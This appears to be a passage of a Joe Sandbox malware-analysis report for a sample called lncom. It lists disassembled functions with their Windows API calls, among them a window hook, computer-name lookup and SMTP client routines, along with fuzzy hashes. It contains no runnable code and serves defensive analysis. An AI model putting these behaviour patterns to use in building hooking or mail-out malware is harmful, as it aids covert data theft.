Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID:
API String ID: 3331096196-0
Opcode ID: ecabb5cc39bb959f20d497f0edd451364b8ad330313e658bedee9fab9c385d5c
Instruction ID: 45a5f234443d5ce5c90d84ff4ffc62bed6bc9c06188ca3a51164ccd612d5e3fc
Opcode Fuzzy Hash: ecabb5cc39bb959f20d497f0edd451364b8ad330313e658bedee9fab9c385d5c
Instruction Fuzzy Hash: 44313E716012019FD750EF2AC8C2B597BE4AF09308F00517AF918DF363E77AD8498B99

Uniqueness

Uniqueness Score: -1.00%

Function 004583EC Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetMenuState.USER32(?,?,?), ref: 0045840F
GetSubMenu.USER32(?,?), ref: 0045841A
GetMenuItemID.USER32(?,?), ref: 00458433
GetMenuStringA.USER32(?,?,?,?,?), ref: 00458486

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: ce605315fd8f35117bfce28ed92c5f5a25bf47a8f283b0755e906677fae94c62
Instruction ID: 86210e699d51edb66358ba7e25244d45699773f440f7661bc4b5f292f68feaa4
Opcode Fuzzy Hash: ce605315fd8f35117bfce28ed92c5f5a25bf47a8f283b0755e906677fae94c62
Instruction Fuzzy Hash: D311DF30200119AFCB00EE2DCC80AAF77E89F4A365B10482EFD08D7352DE389D0697A8

Uniqueness

Uniqueness Score: -1.00%

Function 0046D614 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

EnumWindows.USER32(0046D5A4), ref: 0046D645
GetWindow.USER32(00000003,00000003), ref: 0046D65D
GetWindowLongA.USER32(00000000,000000EC), ref: 0046D66A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,000000EC), ref: 0046D6A6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: b882aed77394bd840175790f3a6a234b0914b7945ca37e47ea0ef7c77d93e195
Instruction ID: 3f5ccc275f8fb52daa5e796da8f910fe7cab89121977440ed711eb00435f455e
Opcode Fuzzy Hash: b882aed77394bd840175790f3a6a234b0914b7945ca37e47ea0ef7c77d93e195
Instruction Fuzzy Hash: D1115E70A05210AFDB10AB18CC85B9677D4AF04724F15466AFA98DB2D2D7789C40CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00484810 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,?,?), ref: 00484827
LoadResource.KERNEL32(00000000,6552540F,00000000,?,?,004812FC,00000000,00000001,00000000,?,00484780,?,?,0048221A,00000000), ref: 00484841
SizeofResource.KERNEL32(00000000,6552540F,00000000,6552540F,00000000,?,?,004812FC,00000000,00000001,00000000,?,00484780,?,?,0048221A), ref: 0048485B
LockResource.KERNEL32(72756F73,00000000,00000000,6552540F,00000000,6552540F,00000000,?,?,004812FC,00000000,00000001,00000000,?,00484780,?), ref: 00484865

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: a9362cc25a05eb8bdbaa13eb8b9dba42d7936065cf04efa73839e152414c5e06
Instruction ID: 5814e4cffa5aab9d150b80894a42fdc44a18e73190361dbbca202aaaf0bd1a86
Opcode Fuzzy Hash: a9362cc25a05eb8bdbaa13eb8b9dba42d7936065cf04efa73839e152414c5e06
Instruction Fuzzy Hash: 47F0FBB66052046F5744FE6EA881DAB77ECDE993A4310056FF908C7206DA38DD01877C

Uniqueness

Uniqueness Score: -1.00%

Function 0049F24C Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,00000004,?,00000000,00000003,?,0049F43E,00000000,?,000000C8), ref: 0049F26C

Part of subcall function 0049F1FC: GetLocalTime.KERNEL32(?,0049F27C,?,C0000000,00000000,00000000,00000002,00000080,00000000,00000004,?,00000000,00000003,?,0049F43E,00000000), ref: 0049F200
Part of subcall function 0049F1FC: wsprintfA.USER32 ref: 0049F239

WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002,00000080,00000000,00000004,?,00000000,00000003), ref: 0049F28E
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002,00000080), ref: 0049F2A3
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002), ref: 0049F2A9

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: File$Write$CloseCreateHandleLocalTimewsprintf
String ID:
API String ID: 893966949-0
Opcode ID: 8ea448020c61f66690cec655929b6b4f5ee2c4ca26fdcb9b0378e7335bc348b3
Instruction ID: 9763d76a3ba596144d68d0ac75bbe518eb35a54e165e2a8bece039c4afdbfc40
Opcode Fuzzy Hash: 8ea448020c61f66690cec655929b6b4f5ee2c4ca26fdcb9b0378e7335bc348b3
Instruction Fuzzy Hash: 19F0367224020479F51072B79C47FEB665CDB85764F20412FF604DA0C2DDA9ED0082BC

Uniqueness

Uniqueness Score: -1.00%

Function 0048B520 Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 0048B530
GetLastError.KERNEL32(?,?), ref: 0048B539
FileTimeToLocalFileTime.KERNEL32(?), ref: 0048B54D
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0048B55C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: c163bcb3ac7a6eedd96896d72fbfec49aff373b7e6826640e13717b86b896cd8
Instruction ID: 119ea1de9c804d90b2174459d6c74a2c1b64740054eeeb33f15c4827f75f0612
Opcode Fuzzy Hash: c163bcb3ac7a6eedd96896d72fbfec49aff373b7e6826640e13717b86b896cd8
Instruction Fuzzy Hash: 6EF0FBB2500204AF8B04EFA4C8C289737ACEB5831431449ABAD05CF24AEA28D954CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 0046CFC4 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0046CFDC
SetWindowsHookExA.USER32(00000003,0046CF80,00000000,00000000), ref: 0046CFEC
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0046F59B,?,?,00000000,?,?,0046EFF5,?), ref: 0046D007
CreateThread.KERNEL32(00000000,000003E8,0046CF24,00000000,00000000), ref: 0046D02B

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: 2f2b1fe8c98717ca2dc9ac71e07dbb1b2616df3abf3bae2708f843e0256c380a
Instruction ID: 69de611c819e1811ad7a8d1c2890e7c531dc8e64a93d22eef40011ec85dffcd6
Opcode Fuzzy Hash: 2f2b1fe8c98717ca2dc9ac71e07dbb1b2616df3abf3bae2708f843e0256c380a
Instruction Fuzzy Hash: ABF03070F873006EF7309B619C96F2736A4A328B5AF11101FF104691D1D7B81485D72F

Uniqueness

Uniqueness Score: -1.00%

Function 004B6F94 Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004B6F98
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004B6FA2
GetDeviceCaps.GDI32(00000000,0000000E), ref: 004B6FAC
ReleaseDC.USER32(00000000,00000000), ref: 004B6FCC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ad12e57a8d70ab0ac4fea8e90a69fede2a97df46bb876b2ac79e73752da88a68
Instruction ID: e0886f9980c369366c4018105e8a67a80c11f627090b9a6f84ef75c5f949353c
Opcode Fuzzy Hash: ad12e57a8d70ab0ac4fea8e90a69fede2a97df46bb876b2ac79e73752da88a68
Instruction Fuzzy Hash: CDE08C61606350E9F220727A2D87FFA0A8CCB11399F05145BFB046A1D3D89C4C8852BD

Uniqueness

Uniqueness Score: -1.00%

Function 0043D3E4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

$530 Please login with USER and PASS., xrefs: 0043D438
150 Opening data connection for %s., xrefs: 0043D541

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID: $530 Please login with USER and PASS.$150 Opening data connection for %s.
API String ID: 0-313837291
Opcode ID: 957c05538da693000015bac8ecd09dd9a6757296abeaacf8128dde0e93ae96db
Instruction ID: c0b82befd87dc7990c4f16ed2b6111d38a603b54b2480af12ea26eed9280f192
Opcode Fuzzy Hash: 957c05538da693000015bac8ecd09dd9a6757296abeaacf8128dde0e93ae96db
Instruction Fuzzy Hash: E9513670A042089FDB15DF68D881BDEBBF5EB4D314F5080EAE94897341D734AE81CE99

Uniqueness

Uniqueness Score: -1.00%

Function 0048E900 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,F), ref: 0048E96B
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,F), ref: 0048E98D

Part of subcall function 004950E0: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00495111

Strings

F, xrefs: 0048E92B

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: F
API String ID: 902310565-3850746006
Opcode ID: 1229d0ee45fc9707059d666de0a4845f6c38dc817b066c4330312cab351d34b4
Instruction ID: 292e69b65ce7abab50ec94fa2b944e39aa18da7c577029c654a1cd6c85ee16be
Opcode Fuzzy Hash: 1229d0ee45fc9707059d666de0a4845f6c38dc817b066c4330312cab351d34b4
Instruction Fuzzy Hash: 2741F570900618DFDB61DF69CC85BDEBBB8AB49304F5044EAE408AB351D778AE84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00442CA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@CheckReady$qqrv.LNCOM(00000000,00442DC3), ref: 00442CED
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM ref: 00442D9D

Strings

SMTP component not connected, xrefs: 00442CFB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: SmtpSmtpprot@$Client@CustomState$Change$qqr19CheckReady$qqrv
String ID: SMTP component not connected
API String ID: 3445412938-1943789953
Opcode ID: c2401824232656f96c1610a20e64006072711869e3d4ef88e7604a465828c03b
Instruction ID: da23a894f10bd94b7d45085ce8e3dc3489258a8935e16b811c3470d87d8ba764
Opcode Fuzzy Hash: c2401824232656f96c1610a20e64006072711869e3d4ef88e7604a465828c03b
Instruction Fuzzy Hash: 90415874A04249DFDB00CF55CA80A9EBBF1FF09304F6041AAE814A7312C3B4AE01DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0048CA34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0048CB12), ref: 0048CABA
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0048CB12), ref: 0048CAC0

Strings

yyyy, xrefs: 0048CA95

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: f373ef3a988a8a2c3ac643c3356d55ced8016670d8ec74caeaeefc84607f81bc
Instruction ID: 2a1af2c837cd69b5a3ee498c4917a26e0bd69fbbb79225255e13e43bbca3bb80
Opcode Fuzzy Hash: f373ef3a988a8a2c3ac643c3356d55ced8016670d8ec74caeaeefc84607f81bc
Instruction Fuzzy Hash: B62135786005089FDB15EFA9C882AAEB7B8EF49704F50447BB805D7351D678AE04C77D

Uniqueness

Uniqueness Score: -1.00%

Function 004101D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(?,00000010), ref: 004101F7

Strings

, xrefs: 004102B6
Unkown, xrefs: 00410280

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ComputerName
String ID: $Unkown
API String ID: 3545744682-3091181481
Opcode ID: 5a5260029d2a6ef1dc8a53598fd07333374a5147c0206ff24b82cea93827ef24
Instruction ID: fa333c37cad968ac2268b8a21f0b4268ae1c4b6292444653a67d9431ec542487
Opcode Fuzzy Hash: 5a5260029d2a6ef1dc8a53598fd07333374a5147c0206ff24b82cea93827ef24
Instruction Fuzzy Hash: 44211D3491020EDBCF00EFD0D545ADDB7B4FF99309F20456AE804B6262E7B85A45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00444054 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@CheckReady$qqrv.LNCOM ref: 0044408C
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv.LNCOM ref: 00444112

Strings

SMTP component already connected, xrefs: 00444073

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Client@CustomSmtpSmtpprot@$Async$qqrvCheckHighLevelReady$qqrv
String ID: SMTP component already connected
API String ID: 277431222-4044972324
Opcode ID: 4a6a5e036a0e8d104bdc1b56f323b1eb991c9c7cddf5ed254a1df1ac94efd8de
Instruction ID: b0d72d215f907900497fdc1e052528a6bd581b7c6c0de58126540184681c9805
Opcode Fuzzy Hash: 4a6a5e036a0e8d104bdc1b56f323b1eb991c9c7cddf5ed254a1df1ac94efd8de
Instruction Fuzzy Hash: 30216A34A04188EFDB00EBA9C686BDDBBF1AF45304F2441E5E458AB362C374AF40DB49

Uniqueness

Uniqueness Score: -1.00%

Function 0044B300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000010), ref: 0044B34F
inet_ntoa.WS2_32(?), ref: 0044B361

Strings

getpeername, xrefs: 0044B354

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: getpeernameinet_ntoa
String ID: getpeername
API String ID: 1982201544-1501237556
Opcode ID: 7c17ca1ebbb8b540ff05e1bcf77e6e2eb5f7827096db5852693825080acac50e
Instruction ID: 2fe588f44b86f0c898644215f4e457c8fc26247059501d607322d183f7578fa5
